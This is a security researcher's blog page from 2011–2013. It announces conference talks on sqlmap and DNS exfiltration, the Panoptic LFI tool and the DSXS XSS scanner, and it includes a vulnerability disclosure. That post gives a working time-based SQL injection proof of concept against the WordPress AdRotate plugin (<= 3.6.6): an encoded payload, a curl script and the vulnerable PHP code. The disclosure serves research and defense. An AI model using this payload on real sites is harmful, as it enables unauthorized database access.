Tuesday, May 28, 2013

sqlmap - Under the Hood

You can find slides for my talk "sqlmap - Under the Hood" held at PHDays 2013 conference (Russia / Moscow 23rd–24th May 2013) here:
Posted by at No comments:

Tuesday, April 9, 2013

Panoptic


Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. Official introductionary post can be found here. Also, you can find a sample run here.

Tool was made in collaboration with Roberto Salgado (@LightOS), while I have to say that he is responsible for the idea itself.

Posted by at No comments:

Monday, October 29, 2012

Spot the Web Vulnerability

You can find slides for my talk "Spot the Web Vulnerability" at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) here:
Posted by at 43 comments:

Tuesday, June 5, 2012

Data Retrieval over DNS in SQL Injection Attacks

You can find paper titled "Data Retrieval over DNS in SQL Injection Attacks" made and presented at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:
Posted by at 4 comments:

DNS exfiltration using sqlmap

You can find slides (together with link to video presentation) for my talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:
Posted by at 2 comments:

Monday, November 14, 2011

WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability 

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EI
DE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpK
SksMCkj

e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,
112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$enc
oded

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."a
drotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare
()
p.s. tried to contact author and WordPress team but without any luck
Posted by at 14 comments:
Labels: ,

Saturday, November 5, 2011

Damn Small XSS Scanner (DSXS)

Damn Small XSS Scanner (DSXS) is a fully functional XSS scanner (supporting GET and POST parameters) written in under 100 lines of code.

As of optional settings it supports HTTP proxy together with HTTP header values "User-Agent", "Referer" and "Cookie".

Latest source code can be found here (update: current version is v0.1f - Nov 11th 2011).

p.s. sample run(s) against LEGAL targets: 
$ python dsxs.py
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

Usage: dsxs.py [options]

Options:
  --version          show program's version number and exit
  -h, --help         show this help message and exit
  -u URL, --url=URL  Target URL (e.g. "http://www.target.com/page.htm?id=1")
  --data=DATA        POST data (e.g. "query=test")
  --cookie=COOKIE    HTTP Cookie header value
  --user-agent=UA    HTTP User-Agent header value
  --random-agent     Use randomly selected HTTP User-Agent header value
  --referer=REFERER  HTTP Referer header value
  --proxy=PROXY      HTTP proxy address (e.g. "http://127.0.0.1:8080")

$ python dsxs.py -u "http://zero.webappsecurity.com/login1.asp" --data="login=te
st&password=test&graphicOption=minimum" --random-agent
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning POST parameter 'login'
 (i) POST parameter 'login' appears to be XSS vulnerable (">...<", outside tags,
 some filtering))
* scanning POST parameter 'password'
* scanning POST parameter 'graphicOption'

scan results: possible vulnerabilities found

$ python dsxs.py -u "http://xss.progphp.com/xss8.html?input=1" --random-agent
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning GET parameter 'input'
 (i) GET parameter 'input' appears to be XSS vulnerable ("...", pure text respon
se, no filtering))

scan results: possible vulnerabilities found

$ python dsxs.py -u "http://xss.progphp.com/xss12.html" --data="bar=secret&foo=t
est"
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning POST parameter 'bar'
* scanning POST parameter 'foo'
 (i) POST parameter 'foo' appears to be XSS vulnerable ("<.'...'.>", inside tag,
 inside single-quotes, some filtering))

scan results: possible vulnerabilities found
p.p.s. ttyrec console recording:
Posted by at 5 comments:
Labels:
Subscribe to: Posts (Atom)